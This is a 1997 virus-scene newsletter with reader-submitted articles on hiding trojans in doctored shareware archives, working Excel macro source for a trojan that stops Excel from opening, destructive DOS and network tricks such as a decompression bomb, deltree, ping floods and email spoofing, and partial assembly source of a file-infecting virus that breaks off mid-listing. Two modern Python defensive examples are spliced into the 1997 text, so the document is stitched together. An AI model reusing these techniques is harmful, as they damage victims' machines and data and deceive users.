God@rky's Virus Heaven Newsletter #3
Written by God@rky
(C)Circle-A Computers 1997 All Rights Reserved...
-----------------------------------------------------------------------------
**Warning**

This magazine deals with Viruses, their production, and their distribution, and frankly anything else that is virus related that we wish to publish here. The ethics of this magazine's very existence may upset you. The intent of this magazine is to keep those interested in collecting or authoring viruses up to date as well as we can with some of the information that can be found here and abroad.

If you have any questions, comments, ideas or article submissions, by all means send them via E-mail at: godarky@ilf.net
-----------------------------------------------------------------------------
CONTENTS

Section One   - Introduction
Section Two   - How To Hide Your Virus/Trojan by Virulent
Section Three - MS-Excel Shutdown Trojan
Section Four  - An Intro To Basic Computer Anarchy & The Techniques Involved
Section Five  - Site News & Info
Section Six   - Virus Heaven Hacked?!?!
Section Seven - The Browser Wars Become Uneven? Maybe...
Section Eight - A Small Virus Section
Section Nine  - The End
=============================================================================
Introduction

Yeah... It's been a little while since I have been able to crank out an issue of the Virus Heaven Newsletter. Those who have been e-mailing me asking when the next issue would be out know that the date has been continually falling further and further behind. The backlog started when I threw out some articles for Virus Bits & Bytes magazine issue #4, and then continued through some upgrades on my system as well as an increasingly larger amount of time I am having to spend at work nowadays.

Since the first issue, I have been getting all kinds of submissions for the newsletter. Some have been used in Virus Bits & Bytes Magazine #4, others have been held for this somewhat special issue of the newsletter.
These are articles I was reluctant to publish due to the fact that they don't really deal with viruses, but more the ilk of Trojans and other forms of Malware. But due to the nature of the computer virus, I have decided that these things belong on their own shelf, and will thus have their own Issue, for the most part.

Most of this newsletter is reader's submissions. If they want to be contacted, they will have left an e-mail address in their submission. Anyhow, Enjoy the issue, and I will keep you posted about the next full scale issue to be released!
=============================================================================
SECTION - 2
How to Hide Your Virus/Trojan (Revisited)
=========================================
by Virulent (mdabrowski@juno.com)

*WARNING*
This article contains info that might be offensive to some. May I remind the reader that in the United States, Canada, and the UK, virus creation is not a crime. Frankly, it's legal everywhere except for Sweden and Switzerland. The author disclaims any responsibility, blah, blah, blah. The author, however interested, doesn't condone the creation of destructive viruses. He hates them himself. If you're gonna do it, he does condone amusing viruses or ones with nifty visual displays.

*NOTES*
Let it be known that I consider myself an AVer, as well as a VXer. Any AVer that's not in the least bit way a VXer is just an AV wannabe. Any VXer that isn't a tad bit an AVer is an idiot. If you're around viruses as long as you might be, you're bound for infection. I have, and I have been toasted by such wonderful creations as Natas. I have no ill will against either community, and I love being a part of them both. If this article angers anyone in the AV community, that's their problem. I believe I'm making and will make lots of contributions to the field. Bug off.

I'd also like it to be known that, for one reason alone, I have personal contempt for George Wenzel. I almost like most people in the AV community.
I have no ill will towards the moderator of alt.comp.virus. Without him, alt.comp.virus would be flooded with make-money-fast posts and such. Kudos. My one reason for hating Mr. Wenzel is the fact that he likes to complain about VXers to their ISPs. This is a mean and contemptuous practice that must be stopped. No one should be "afraid" to post whatever they want on the Net. If you've been "harassed" by Mr. Wenzel at any point, contact me. I'd like to hear about it. And that's the only reason I dislike the man. I think he does a fine job on producing the comp.virus mini-faq. This has been my two-cent editorial on myself and those around me. Read it and weep, compadre.

Necessary Software:

NUTILS20.ZIP - The Nowhere Utilities
  Available everywhere. They're a must have for any power user, not just those into viruses.

STEGANOS.ZIP - Steganos
  Available in many places, or by contacting me. It hides any file into a graphic, sound, or ASCII file. Also will support new file types, if necessary.
=========================================

An article in CPI Newsletter Issue 2 starts, "So you've made the most k-rad virus in the history of the world. So what do you do with the damn thing?" This topic has been revisited by me, only because I've found new techniques that must be told. I'll also go over many older techniques, for the sake of completeness. For my ideas, the two pieces of software above are necessary. I use both of them every day, not just for my viral needs.

I. The Basics
=============

Okay, here goes. The most basic way to hide a piece of viral software is to simply infect any old piece of shareware and upload it to a BBS or post it to a newsgroup. This is pretty pointless, especially for viruses that are not encrypted in any way or just don't work. They also get pointed out quickly, and you get flamed. Or George Wenzel gets your account canceled, whatever floats your boat. You should feel like a moron.

II. PKLITE Files - More Virus, Less Byte
========================================

Doing! A light goes on in your head. You decide to PKLITE the file, remove the header, and then upload/post it. This may fool some scanners, but the good ones may still catch it. PKLITE reduces the size of a file. Viruses increase the size. If, in the end, the PKLITEd infected file is smaller than the original, use RESIZE, one of The Nowhere Utilities. That was Tip #1.

In the end, even if the end user doesn't have a good scanner, he still may notice the file has changed, if:

1.) You haven't changed the size of the file in PACKING.LST or what have you.
2.) There's no authentication on the ZIP file. This is especially so for software from big name companies.
3.) The time/date stamp reads 1:05 a.m., yesterday morning when the rest of the files read 3:15 p.m., July 9th, 1994.

There are utilities around to solve these problems. Windows Notepad will solve #1. A program - I can't remember the name - distributed with an issue of 40Hex might solve #2. FIXTIME (A Nowhere Utility) will solve #3. Voila! The end user is completely fooled. Even though you may be miles away, you can hear him/her swearing as his CMOS is wiped out, or whatever.

You go into school the next day, and you get a note from a friend. He needs a copy of ZeroBug.52086GFgbf?64, a new virus of which you have one of the 4 copies in the world. George Wenzel got your friend's account canceled, so he can't get it via e-mail. You decide the only way to get it to him is through the school's BBS.

III. Getting that file to your Vx buddy
=======================================

It turns out the teacher running the BBS is a paranoid little jerk that not only has 19 virus scanners scanning each upload, but personally inspects each file for usual stuff. And they pay him for this! Since the guy checks everything out, using the PKLITE technique ain't gonna help you.
Luckily, you and your friend picked up a copy of STEGANOS, either from that brilliant article author, Virulent, or off some site on the Net. You decide to hide Zerobug in a picture of your personal hero, Bill Gates, or maybe that F-Prot wallpaper BMP Datafellows distributes. STEGANOS is simple to use. The syntax is as such:

STEGANOS

  E or D means encode or decode
  /B means keep a backup of the original graphic file
  /D means to delete the file you've just hidden.

It's pretty simple. So the jerk at school looks at your BMP of Chairman Bill, and just sees some pixels with strange colors. "Hmm. Must have had errors in the transfer." Your friend downloads the BMP and now has a copy of the now infamous Zerobug variant. (BTW, Zerobug is a neat virus, especially when you deliberately infect yourself to see the nifty effect. :) )

IV. Can You Go Over That Again?
===============================

You may want to know EXACTLY how to do what I said in Section II, so I'll go over the command-by-command play of me replacing a copy of SoftRam, a Windows memory manager, with a trojan horse. It turns out that the thing I've selected to replace SoftRam with is a trojan, so I can't just infect the installation file. The setup's a Windows program anyway, so it'll be futile. I'll have to replace SETUP.EXE with the trojan. The trojan's name is Hemoroids, which I got off God@rky's web site. Here's a DIR of the original files in the zip:

README   WRI     20480 05-08-95  12:00p
SETUP    EXE    273920 05-08-95  12:00p
SETUP    INS     21085 05-08-95  12:00p
SETUP    LGO       391 05-08-95  12:00p
SETUP    PKG       193 05-08-95  12:00p
SRAM     Z       95294 05-08-95  12:00p
SRAMRES  DLL     15040 05-08-95  12:00p
~INS0763 LIB      7190 05-08-95  12:00p
IMORTAL1 ASC      1448 07-01-96   7:15p
HEMOROID EXE      2448 06-20-96  10:32p

IMORTAL1.ASC would be an ad for the BBS I downloaded it from, which would be The Isles of the Immortals. (203-266-6079 8N1) I'd then take HEMOROID.EXE, which is 2448 bytes.
Due to the 271,472 byte difference between HEMOROID.EXE and SETUP.EXE, I can't just rename HEMOROID.EXE. There's also the year time/date difference. So I'll first RESIZE (A Nowhere Util) HEMOROID to the size of SETUP:

RESIZE -R 273920 HEMOROID.EXE

-R is so that the 270,000 some odd bytes put into HEMOROID aren't all zeros, or it'll compress to around 5k. HEMOROID and SETUP are now the same size. Now the time/date stamp:

FIXTIME 05-08-95 12:00 HEMOROID.EXE

The directory listing should look like this now:

README   WRI     20480 05-08-95  12:00p
SETUP    EXE    273920 05-08-95  12:00p
SETUP    INS     21085 05-08-95  12:00p
SETUP    LGO       391 05-08-95  12:00p
SETUP    PKG       193 05-08-95  12:00p
SRAM     Z       95294 05-08-95  12:00p
SRAMRES  DLL     15040 05-08-95  12:00p
~INS0763 LIB      7190 05-08-95  12:00p
IMORTAL1 ASC      1448 07-01-96   7:15p
HEMOROID EXE    273920 05-08-95  12:00p

Good. Now you can rename HEMOROID to SETUP. But the dang project isn't done yet. We need to PKZIP it up! Here are the two zip files. SOFTRAM.ZIP is the original. SOFTRAMI.ZIP is the infected one. I've also fixed the time/date stamp on SOFTRAMI.ZIP. The reason the ZIP's time/date stamp is so new is that, since I downloaded it from a BBS, a ZIP comment was added, changing the date.

SOFTRAMI ZIP    394813 09-09-96   9:50p
IMORTAL1 ASC      1448 07-01-96   7:15p
SOFTRAM  ZIP    371552 09-09-96   9:50p

IMORTAL1.ASC is our BBS comment file. Since the ZIPs aren't relatively exact until we add the comment, I'll do it:

PKZIP -Z SOFTRAMI.ZIP < IMORTAL1.ASC

And I'll fix the time/date stamp again. Now SOFTRAMI.ZIP could effectively pass as the original. And there's only a 23,261 byte size difference. And no one usually runs FC (file compare) on two ZIPs like that. Now you'd upload SOFTRAMI.ZIP (after renaming it and such) to your favorite BBS, or post it to your favorite binaries newsgroup.

I never actually had SoftRam. It's a commercial program, so I had someone who did have it send me a DIR of the files to work with.
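A defender's counterpoint to the walk-through above, added here as an example and not part of Virulent's article: the only things the victim in the story ever compares are file name, size and date/time, and RESIZE plus FIXTIME satisfy all three. A published SHA-256 manifest is not fooled by any of that, and the random fill that -R adds (so the archive does not shrink) is itself a tell, because real code compresses and random bytes do not. Everything below is constructed in memory; the stand-in file names, the 4096-byte length, the timestamp and the 0.9 compressibility threshold are this example's own choices, not values from the article.

```python
"""Added example: hash-based verification versus the size/date check the
article defeats. Not from the newsletter; all names and data are constructed."""
import hashlib
import hmac
import os
import zlib
from dataclasses import dataclass


@dataclass
class FileRecord:
    """The three things a DIR listing shows, plus the bytes themselves."""
    name: str
    data: bytes
    mtime: int  # seconds since the epoch


TARGET_LEN = 4096  # constructed stand-in for the 273,920-byte SETUP.EXE

# Constructed "original": repetitive content, so it compresses the way real code does.
ORIGINAL = FileRecord(
    name="SETUP.EXE",
    data=(b"MZ" + b"real installer code " * 300)[:TARGET_LEN],
    mtime=799_000_000,
)

# Constructed "replacement": a tiny stub padded with random bytes to the same
# length (what RESIZE -R does) and given the same mtime (what FIXTIME does).
_STUB = b"MZ" + b"tiny replacement stub"
REPLACEMENT = FileRecord(
    name="SETUP.EXE",
    data=_STUB + os.urandom(TARGET_LEN - len(_STUB)),
    mtime=ORIGINAL.mtime,
)


def naive_matches(a: FileRecord, b: FileRecord) -> bool:
    """The article's victim: same name, same size, same date/time -> 'unchanged'."""
    return (a.name, len(a.data), a.mtime) == (b.name, len(b.data), b.mtime)


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def build_manifest(files: list) -> dict:
    """Publisher side: one digest per file. Size and date are not recorded at all."""
    return {f.name: sha256_hex(f.data) for f in files}


def verify_against_manifest(manifest: dict, f: FileRecord) -> bool:
    """Consumer side: recompute the digest and compare in constant time."""
    expected = manifest.get(f.name)
    return expected is not None and hmac.compare_digest(expected, sha256_hex(f.data))


def compression_ratio(data: bytes) -> float:
    """Compressed size over raw size. Code and text land well below 1.0;
    random padding stays at or slightly above 1.0."""
    return len(zlib.compress(data, 9)) / len(data)


def looks_randomly_padded(f: FileRecord, threshold: float = 0.9) -> bool:
    """Triage heuristic for files whose bulk is incompressible filler."""
    return compression_ratio(f.data) > threshold


if __name__ == "__main__":
    manifest = build_manifest([ORIGINAL])
    print("DIR-style check says unchanged: ", naive_matches(ORIGINAL, REPLACEMENT))
    print("manifest verifies original:     ", verify_against_manifest(manifest, ORIGINAL))
    print("manifest verifies replacement:  ", verify_against_manifest(manifest, REPLACEMENT))
    print(f"replacement compression ratio:   {compression_ratio(REPLACEMENT.data):.2f}")
```

The manifest check is the one that matters; the compressibility flag is only a triage hint, since legitimately packed or encrypted files also compress poorly and a padder that fills with zeros (the article's own reason for -R) would compress fine. It catches exactly the trick the article recommends, nothing more.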
I wouldn't use SoftRam as a trojan myself, considering there's more non-warez newsgroups and BBSes than there are warez ones, and we're going for maximum reach with the same file, eh?

V. Conclusion
=============

I've gone over a lot of techniques and such with you today, and I hope you use them well. As always, I take no responsibility. I hope this article sort of raises my standing in the Vx community, while not lowering it in the Av community. If you have anything to add to this article, please e-mail me. If you have a flame, and are on a Unix-type system, type it into a text file and move it to /dev/null.

In the future, I intend to write more articles and to possibly come out with my own virus scanner to take out any virus on the WildList or whatever. I hope to eventually even be one of the participants. If you'd like to join me on any of my yet-to-be-infamous exploits, my e-mail address is at the top of this article.

Thanks,
Virulent.
=============================================================================
SECTION - 3
MS-Excel Macro - Shutdown Trojan

The "shutdown.xls" is a trojan that, although nondestructive, is sure to piss off and confuse the average Excel user. It contains an Auto_Open macro which creates an ".xla" add-in file in the person's Excel startup directory entitled "msexcel.xls" (sounds pretty innocent, kinda like something you certainly wouldn't want to delete). The sole purpose of this file is to close Excel. The first time you open shutdown.xls, it creates this xla file, then disappears, then shuts Excel off. Every time you try to open Excel in the future, it starts to fire up, then automatically opens the xla file in the startup directory, then shuts down. Until you delete the msexcel.xls file in your startup directory, you will be unable to open Excel. The beauty of an xla file is that you can't open it to see the contents. No one is going to want to delete something that they can't look at first, especially with a name like msexcel.xls.
If you want to create this yourself, the source code to the macro is below. I have tested it using Excel 5 for Win3.1 and Excel for Win95.

Sub Auto_Open()
    Application.DisplayAlerts = False
    Dim Start As String
    Start = Application.StartupPath
    ChDir Start
    ExecuteExcel4Macro "VBA.MAKE.ADDIN(""msexcel.xla"")"
    Application.Quit
End Sub

That's it! Just name the file "msexcel.xls" and you are done!

(Editor's Note): If you would like to see more of this guy's work, check out the Yohimbe Excel Macro Virus that appeared in Virus Bits & Bytes Magazine Issue #4.
=============================================================================
SECTION - 4
An Introduction to basic computer anarchy and the techniques involved
McNasty 1996
-----------------------------------------------------------------------------
Why am I writing this?

I'm writing this due to the fact that I'm always being asked to help people who want to learn how to hack or how to create mayhem on other people's computers and I'm sick of repeating myself. I personally will accept no responsibility for any of the methods I describe creating damage on someone else's computer. If you're gonna do it, take the rap for it yerself! I'll try to outline some methods you can use to really give people a hard time if you feel fit.

Contents:

  The Worm (and how to create a simple one using common ingredients found around the home)
  Tricks using DOS
  FakeMail
  Networking Havoc

That's about all for this first tutorial, if you want more just drop me a line or give God@rky a shout and he'll pass it on.

1. The Worm

What is a worm? A worm is a piece of code that basically replicates itself locally (not to be confused with a virus... the worm does not transfer from host to host, it just fucks up the computer it's run on). For example, a file that just gets bigger and bigger until you got no more space left on your HDD. Sounds funky? It's dead easy to write and it's spectacular when it goes off!
Imagine a 50k exe file that when it's run suddenly changes to 200MB, and if you ain't got 200MB free on your HDD you got big problems! Try this (I've already done so and it works fine and dandy). I've left out important bits, but once you get the idea it shouldn't be hard to suss out how to make it even worse.

Create a text file using edit (I usually create a file that's full of spaces with the words "This space left intentionally blank" in the middle of the page) and press enter until it's quite large. Highlight the lot and copy and paste the text a few times until you have quite a large txt file, then save it.

Next write a batch file (called 1.bat or something like that) that copies your txt file onto itself and keeps looping. Example:

:loop
copy stuff.txt stuff2.txt
copy stuff.txt+stuff2.txt stuff.txt
dir stuff.txt
goto loop

Now run the bat file and watch it grow..... within a few minutes you've got a HUGE txt file that basically says 'this space left intentionally blank'. When you've got a file sufficiently large enough (ie you've run out of disk space!) you've got the fun bit......

Enter the PK family....

OK, right, now just point PKZIP at it and you'll see the txt file compress to around 100k (depending on the compression type you use..... I've actually had it to about 50k!) Now you have a 100K zip file containing a 200MB txt file..... Right, now run ZIP2EXE on it and turn it into an exe file, et voila! Instant bomb!

You can add a few little extras here. There's a program in the nowhere utilities that's a file padder. Run that and point it at your exe file to make it exactly the same as a known file on the victim's computer. Then plant it and sit back and watch the fireworks.

Another way of getting the victim to run the bomb is to get a copy of QBASIC 4.5 or VB and write a little program that looks like an installer, but instead of installing it's doing damage. I got a guy with this and he was running the installer for 20 mins.
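The archive built above is what is now called a decompression bomb, and it is visible before a single byte is inflated, because a ZIP's central directory declares each member's compressed and uncompressed size. The Python below is an added example written from the defender's side, not part of McNasty's article: it constructs a small archive in memory (one member a few megabytes of the article's "This space left intentionally blank" text, the other an ordinary README), then screens it on declared expansion ratio and total declared size without extracting anything. The member names, the 100:1 ratio limit and the 512 MiB cap are this example's own choices.

```python
"""Added example: screening a ZIP for a decompression bomb using only the
central directory. Not from the newsletter; the archive is constructed here."""
import io
import zipfile
from dataclasses import dataclass

# Policy limits chosen for this example. Deflate tops out near 1000:1 on
# pathological input; ordinary software archives sit far below 100:1.
MAX_RATIO = 100.0
MAX_TOTAL_BYTES = 512 * 1024 * 1024


@dataclass
class Finding:
    name: str
    compressed: int
    declared: int
    ratio: float


def build_sample_archive() -> bytes:
    """Constructed input: a README plus a member made of one repeated line,
    which is what the article's copy/paste loop produces at scale."""
    line = b"This space left intentionally blank".center(78) + b"\r\n"  # 80 bytes
    repetitive = line * 40_000  # 3,200,000 bytes; deflates to a few KB
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED, compresslevel=9) as zf:
        zf.writestr("README.TXT", b"Shareware v1.0\r\nSee docs.\r\n")
        zf.writestr("STUFF.TXT", repetitive)
    return buf.getvalue()


def scan_archive(data: bytes, max_ratio: float = MAX_RATIO,
                 max_total: int = MAX_TOTAL_BYTES):
    """Return (accepted, findings, total_declared_bytes).

    Nothing is inflated: only the sizes recorded in the central directory
    are read. A member is flagged when declared/compressed exceeds max_ratio;
    the archive is rejected on any flag or when the declared total exceeds
    max_total. A hostile header can lie about file_size, so this is a
    pre-filter; the extractor itself still has to enforce a byte budget.
    """
    findings = []
    total = 0
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            total += info.file_size
            ratio = info.file_size / max(info.compress_size, 1)  # avoid /0
            if ratio > max_ratio:
                findings.append(Finding(info.filename, info.compress_size,
                                        info.file_size, ratio))
    accepted = not findings and total <= max_total
    return accepted, findings, total


if __name__ == "__main__":
    archive = build_sample_archive()
    ok, hits, total = scan_archive(archive)
    print(f"archive is {len(archive)} bytes, declares {total} bytes, accepted={ok}")
    for h in hits:
        print(f"  {h.name}: {h.compressed} -> {h.declared} bytes ({h.ratio:.0f}:1)")
```

The same two numbers are what a mail gateway or upload scanner reads when it refuses an archive up front; the ZIP2EXE step in the article changes the container but not the ratio, which is why self-extractors are normally unpacked in a sandbox with a hard output cap rather than run.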
After he got bored of waiting he rebooted, only to find that his HDD was full of a HUGE txt file (he had a 1GB HDD) and wouldn't boot 'cos the boot sector had been corrupted.

The hardest thing with a worm is actually getting the victim to run it. If you use one of the ways I described it should make it a lot easier to dupe your victim into committing HD Murder.

2. Tricks using DOS

Yeah yeah yeah, I know what you're saying: 'we use windows, why use dos?'. Basically you can do a helluva lot more with a CLI than you can with a GUI (at least at the moment you can) and it's easier to work with (as far as I'm concerned!)

Some undocumented stuff to do in DOS (some of it good, some of it not). ONLY TRY THESE IF YOU WANT TO AND DON'T EVEN THINK ABOUT BLAMING ME IF YOU FUCK UP YOUR COMPUTER!

Echo 123>clock$

This is a funky little command that overwrites your internal dos variable clock$ and crashes your computer with a stack overflow. After rebooting you will notice that your bios has been corrupted and, depending on your bios, all your settings have been filled with shit. Some BIOSes only get the date and time corrupted, but some actually completely reset themselves (not nice if your bios doesn't have a HD autodetect!) There are all sorts of internal variables that you can overwrite with the echo command. To get a list of these type mem/debug/p and see what you can play with BUT BE CAREFUL!

The eternally famous deltree /y c:\windows just deletes your windows directory without prompting for confirmation. This also works with format too.

Attrib c:\command.com +h +s +r means that you'll have to boot from floppy until you unhide command.com.
A handy thing to do (but you need a little time in private) is to run PCTOOLS or norton hex editor and change the boot sector info on your or your victim's HDD from "NON bootable disk blah blah blah" to "This disk has been infected by the Good-Times Virus". Then every time you format a floppy from your computer, the boot sectors of the disks you format will have a message about the goodtimes virus if you try to boot from them!

3. FakeMail (or how to confuse the hell out of lamers)

This is also very handy for stopping unwanted spam coming in by spammers stealing your email address from the newsgroups. In Netscape select Options, then Mail and News Preferences, then Identity, and change your return email address to whatever you want (I have been known to make it the same email address as the victim you want to hit with the fakemail so when he replies he just spams himself!)

NOTE: This takes effect on the NEXT email you send, so if you've already selected to send an email and then change your return address and identity it will not take effect on that email. BE AWARE OF THIS AS IT CAN GET YOU IN SOME SHIT IF YOU SEND OBNOXIOUS MAILS THINKING YOU'VE REMOVED ALL TRACE OF YOUR IDENTITY.

Also, be aware of the fact that this is not untraceable. The only way of sending untraceable email is either by using the port25 option in UNIX or using an anonymous remailer (even then the remailer has an obligation to give your details to the authorities if requested to do so in some countries).

4. Networking Havoc

If you have a network in your office or school you can create all sorts of mayhem. Here are a few ways to do so.

Ping!

If your net transport is tcpip you can really bring the network speed down by ping flooding everyone. Find out the ip address of your victim(s) and then just ping them continually from a bat file. ie..

:loop
ping 127.0.0.1   (or the ip address of the victim's terminal)
goto loop

and then run the batch file in the background.
In windows95/NT if you have tcpip networking you have ping in your windows directory as well as a few other things like telnet and tracert.

SwapFile Havoc!

If the victim on the network has a shared directory (ie to play network doom etc..) you can really play hell with their computer.

Map the victim's directory.
Create a new directory on the victim's shared directory.
Create a bat file on your computer like this (I'll use doom as an example):

:loop
copy x:\doom.wad x:\new\doom.wad
del x:\doom.wad
copy x:\new\doom.wad x:\doom.wad
del x:\new\doom.wad
goto loop

Basically, this copies the doom.wad backwards and forwards between the original directory and the new directory. Bearing in mind that the doom.wad is about 15MB and is deleted when copied, the victim just sees his hard drive going ballistic and all his processes slow down to a crawl, because he's having to share hard drive access between his swapfile and a remote process (which doesn't affect the speed of your terminal!) I did this to a victim and he ended up reformatting his HD because his computer was running like a pig and hammering his HD all the time.

Another advantage of running stuff like this from a remote terminal is that if you are about to be discovered, you can always switch off the process.

Well, that's it for now. If you liked this, thanks. If you didn't, why did you bother downloading it in the first place! If you want more, let me know.

McNasty
=============================================================================
SECTION - 5
Site News & Info
By God@rky

Well there has been quite a bit of things going on in the VX world. Perhaps I will remember it all, perhaps not.

One of the biggest additions to the Vx world recently was the appearance of the West Coast Institute Of Virus Research (www.wcivr.com). There has been much talk about this site, and I can see why. The site is maintained by Falcon, and contains a very vast collection of Viruses.
In the newsgroup alt.comp.virus, there has been some squabbling over whether or not the AV programs mentioned on the site detect the viruses or not. Many of the viruses there are indeed detected. And I believe there will be quite a few there that aren't currently detected. I personally don't have the time to test my own site and collection, let alone Falcon's. And really, what is it with the interest it has stirred up anyway of the AV folks? Since when did they start caring whether claims a Vx site makes are true or not, or for that matter backed by science? Get real. Anyways, the URL is:

http://www.wcivr.com

Give it a look-see, you may be surprised, and it may become a vastly used bookmark in your browser.

The Virus Programming Instruction Page is back on-line with a new ISP. Be sure and update your links to http://www.goodnet.com/~jwools/vir.htm

As many of you noticed (depending on where you picked up VBB Issue #4), the VBB site has received a face-lift. Still in the same location, just organized somewhat differently.

Received news a while back, not sure if it is still available or not:

The Earth Crisis (203)753-3212 8N1

It runs a little slow on purpose. They have deliberately put up some lame stuff to stop some people from calling. Supposed to be a HEAVY VX BBS. Dunno, haven't had the desire to see my LD phone bill take a rise recently, so I have not checked it out.
=============================================================================
SECTION - 6
Virus Heaven Hacked?!?!
By God@rky

I guess as many of you may have seen, The Virus Heaven Website was hacked. The only damage done was visual, and simply remedied by re-loading the HTML onto the site. Instead of the usual Anti-Censorship Garb that appears on the graphics version of the site, the hacks left a "Microsoft Nazis" logo there, and renamed the "40hex" zines to "40sex". As I said, it was an uninspired easy hack, that was easily remedied. Then afterwards, I was unable to access my E-mail or update the site.
I am not sure if this was due to Chaos changing my password (to prevent further hacks through my account) and not informing me of the change, or if my account was hacked a second time. The total time I was unable to update the site or check my mail was exactly ONE MONTH.

Also, as many of you noticed, a week or two after my site was hacked, The Alliance Virus Group page was hacked as well. The leftovers, at that point named "The Alliance Virus Football Page", with links to a S.I.N. site and some other site that escapes memory now, and captioned at the bottom, "Hacked By DaFool".

During this time, I thought a lot about the site I maintain, and the Service/Disservice I provide the Internet Community. At one point, I became tired of the entire commotion that comes about when you make viruses available over the Internet. The size of the withdrawals from my precious wallet of spare time that the site made were quite large. I was ready to end the site.

It was voiced by many that DaFool, and whoever else hacked the ILF Server, were doing a great disservice to the entire hacking community, as the server will provide a home, hassle free, for such sites. Others stated that it was probably a hack aimed at the Alliance for some kind of mental masturbation in a "Hack-war" of some sorts. But then again, who really gives a fuck, huh? The hack apparently provided a service, as security was upped at ILF.

I have decided against shutting down the site for the time being. I am not sure what made me change my mind to continue running the site... Hell, who knows when it will change again. Many of the sites on ILF are now gone. One of the hard drives was cleared, so they will be re-appearing in a matter of time. But I thought it was important that I let you all know why I wasn't responding to your mail or why the Virus Of the Month for February were 2-3 months old.
=============================================================================
SECTION - 7
The Browser Wars Become Uneven? Maybe...
By God@rky

(NOTE: This article's primary reason for appearing in this issue is because of the possibility made for WWW trojans)

We all have been witness to the battle between Microsoft and Netscape. The battlefield? Primarily the WWW. The weapons? All the plug-ins and processor bogging features you can (or in some cases CAN'T) handle. But a new weapon brought in by Microsoft may have backfired. That weapon is known as ACTIVE-X.

I am not going to go into the specifics of ACTIVE-X's flaws or security holes; there will be a URL at the end of this article which will take you to a site that will tell you everything you wanted to know about the problems with Internet Explorer and Active-X. Apparently Active-X makes it possible to run *ANY* program on the client machine of the person who is viewing the page with the proper Active-X malware scripted into it. I suppose this means that a "harmless" viewing of your favorite web site can trigger the FORMAT command, or even a virus (Vx dropper). From everything I have read, this is not possible with Netscape (any version).

And from recent news, I guess Microsoft isn't planning on plugging these security holes. But then why would they? They didn't make it any harder to create Macro Viruses with Office 97 in either Excel or Word. Now that there are more than 400 Word Macro Viruses alone, and probably quite a few more being made each day, there isn't much they can do.

Here is the URL for the site that dives into the world of Over-If-Not-Hyper-Active-X and Internet Explorer:

http://www.halcyon.com/mclain/ActiveX/

(Note: Not sure, as I don't use Internet Explorer, but I would recommend using Netscape when you visit this site.)
=============================================================================
SECTION - 8
The Small Virus Section

Well I just didn't think it would be right to do an issue without some sort of virus info in it, so here we are.
Some of you are framiliar with the King Lizard line of viruses (the Coconut family). Well here are dooMSday's careful analysis of the first two coconut viruses, COCONUT-OW! and COCONUT-AP! ; ------------------------------------------------------------------------ ; THE COCONUT-AP! VIRUS ; (analysis: dooMSday) ; ; * direct action com-file infector (only if 128 < filesize < 60000 bytes ; and if filename is not '??MM????.COM' --> no COMMAND.COM infection) ; * tries to infect two files each time an infected file is executed ; * no date/time change ; * encrypted ; * debugger trap ; * activation date: Dec. 25th / Dec. 31st --> displays message ; * able to change directory (".." method) ; * signature "IN" at offset 0103h ; * virus author: @King Lizard ; ------------------------------------------------------------------------ .MODEL TINY .RADIX 16 .CODE ORG 100 START: JMP VIR_ENTRY DB 49,4E ;-------- original program code ----------- ; db 79 dup (90) INT 20 ;------------------------------------------ VIR_ENTRY: CALL GET_IP GET_IP: MOV AX,4C00 SUB AH,22 ;AX=2Ah INT 21 ;get Date POP BP PUSH DX SUB BP,0108 ;BP=007Bh CALL DECODE POP DX CMP DH,0C ;month=Dec. ? JNZ LAB_02 CMP DL,19 ;day=25 ? JZ LAB_01 CMP DL,1F ;day=31 ? JNZ LAB_02 LAB_01: CALL PAYLOAD LAB_02: CALL NEW_VECTOR CALL RESTORE_BYTES CALL PROC_2 CALL PROC_3 FIND_FIRST: MOV AH,4Dh INC AH ;AH=4Eh MOV CX,0007 LEA DX,[BP+07EDh] ;(COM_STRING) INT 21 ;Find First JNB LAB_06 JMP LAB_05 LAB_07: JMP LAB_03 LAB_06: ; file= '??MM????.COM' ? CMP WORD PTR DS:[BP+08B3],4D4Dh JZ LAB_07 ;file length: CMP WORD PTR DS:[BP+08ADh],0080 JB LAB_07 ; < 128 Bytes ! CMP WORD PTR DS:[BP+08ADh],60EA JA LAB_07 ; > 60000 Bytes ! LEA DX,[BP+08B1] MOV AX,4C00 SUB AX,08FF ;AX=4301h SUB CX,CX INT 21 ;set attrib. JB LAB_07 MOV AX,4C00 SUB AX,0EFE ;AX=3D02h LEA DX,[BP+08B1] INT 21 ;open file JB LAB_07 XCHG BX,AX ;BX=handle MOV CX,0005 MOV AH,3F ;read file LEA DX,[BP+0845] ;[ORIGINAL_BYTES] INT 21 CMP WORD PTR DS:[BP+0848],4E49 ;signature ? 
JZ LAB_07 CALL MOVE_POINTER SUB AX,0003 MOV DS:[BP+0841],AX ;[P_JUMP+1] MOV AX,4200 ;move file pointer CWD SUB CX,CX INT 21 MOV CX,0005 MOV AH,3F INC AH ;AH=40h LEA DX,[BP+0840] ;(P_JUMP) INT 21 ;write file CALL MOVE_POINTER CALL NEW_KEY CALL ENCODE MOV CX,074E MOV AH,3F INC AH ;AH=40h LEA DX,[BP+0105] ;(VIR_ENTRY) INT 21 ;write file CALL DECODE CALL PROC_4 LAB_05: INC BYTE PTR DS:[BP+084F] ;[U_K] CMP BYTE PTR DS:[BP+084F],02 ;[U_K] JNZ LAB_03 MOV AX,4C00 SUB AH,32 ;AH=1Ah MOV DX,0080 INT 21 ;set DTA Adr. MOV AH,3Bh ;set directory LEA DX,[BP+0852] ;(P_DIRECTORY) INT 21 CALL RESTORE_VECTOR MOV BX,0101 DEC BX JMP BX ;Jump 0100 LAB_03: CALL PROC_4 MOV AH,50 DEC AH ;AH=4Fh INT 21 ;find next JB LAB_04 JMP LAB_06 LAB_04: MOV AH,3Bh ;set directory LEA DX,[BP+084A] ;(PARENT_DIR) INT 21 JB LAB_05 JMP FIND_FIRST MOVE_POINTER: MOV AX,4202 ;move file pointer CWD SUB CX,CX INT 3 RET NEW_VECTOR: CLI PUSH DS XOR AX,AX MOV DS,AX ;DS=0000h MOV AX,word ptr[offset start-00F4] ;get Int 03h offset ;and save it MOV CS:[BP+083C],AX ;[INT_3_OFFSET] MOV AX,word ptr[offset start-00F2] ;get Int 03h segment ;and save it MOV CS:[BP+083E],AX ;[INT_3_SEGMENT] MOV AX,word ptr[offset start-007C] ;get Int 21h offset MOV word ptr[offset start-00F4],AX ;copy to Int 3 offset MOV AX,word ptr[offset start-007A] ;get Int 21h segment MOV word ptr[offset start-00F2],AX ;copy to Int 3 